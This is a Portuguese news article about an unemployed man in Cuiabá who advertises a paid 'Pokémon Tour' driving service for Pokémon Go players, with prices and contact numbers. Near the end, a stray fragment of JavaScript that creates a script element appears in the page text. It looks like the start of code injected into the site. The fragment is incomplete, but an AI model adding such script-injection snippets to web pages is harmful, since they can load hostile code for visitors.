Capa / Em Destaque / Desempregado há dois meses, homem vira motorista de caçadores de pokémon em Cuiabá

Desempregado há dois meses, homem vira motorista de caçadores de pokémon em Cuiabá

DESEMPREGADOOlhar Direto

Geovani Evangelista estava caçando pokémons enquanto dirigia e quase bateu o carro. Na hora veio um insight: muitas pessoas devem estar na mesma situação. Desde que o jogo foi lançado no Brasil, na última quarta-feira (4), se tornou febre em todo o país e em Cuiabá não foi diferente. Desempregado há dois meses, o cuiabano decidiu unir o útil ao agradável e oferecer um serviço ainda inexistente na cidade, o “Pokémon Tour”.

O anúncio foi postado na Olx na última semana, e nesta madrugada Geovani decidiu incluir outros atrativos. “Antes eu estava oferecendo só o serviço de levar a pessoa para os lugares, porque tem pokémons que você só acha na água, no mato, etc… aí ontem coloquei também que vou oferecer água gelada, suco e bolacha, pra não ter a preocupação de parar para comprar comida”, explica. O cuiabano oferece turnos de cinco horas, com opções de manhã, tarde e noite.

Até o momento ele ainda não fez nenhum tour, mas conta que já houve diversos contatos. “Tem um rapaz que marcou comigo para levar o filho dele, de dezessete anos, porque ele não tem tempo de sair com o filho pra caçar Pokémon”, conta. Assim, ele vai atraindo os clientes, tanto os que não têm meio de transporte, quanto os que querem mais calma e atenção na caçada.

À princípio, Geovani vai fazer os tours de moto: “Porque é mais ágil, dá pra ir para mais lugares neste meio tempo. Mas se eu conseguir fechar um número maior de pessoas no mesmo turno, podemos ir de carro também”. O cuiabano garante que é habilitado e que tudo é feito com extrema segurança.

O preço de um tour, que dura cinco horas, é de R$100, com as bebidas e o lanche incluso. Segundo Geovani, atualmente ele é o único a oferecer esse serviço na capital mato-grossense. Quem quiser contratá-lo ou obter mais informações, pode entrar em contato pelo telefone (65) 99208-3560 ou (65) 98463-3234.

 var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top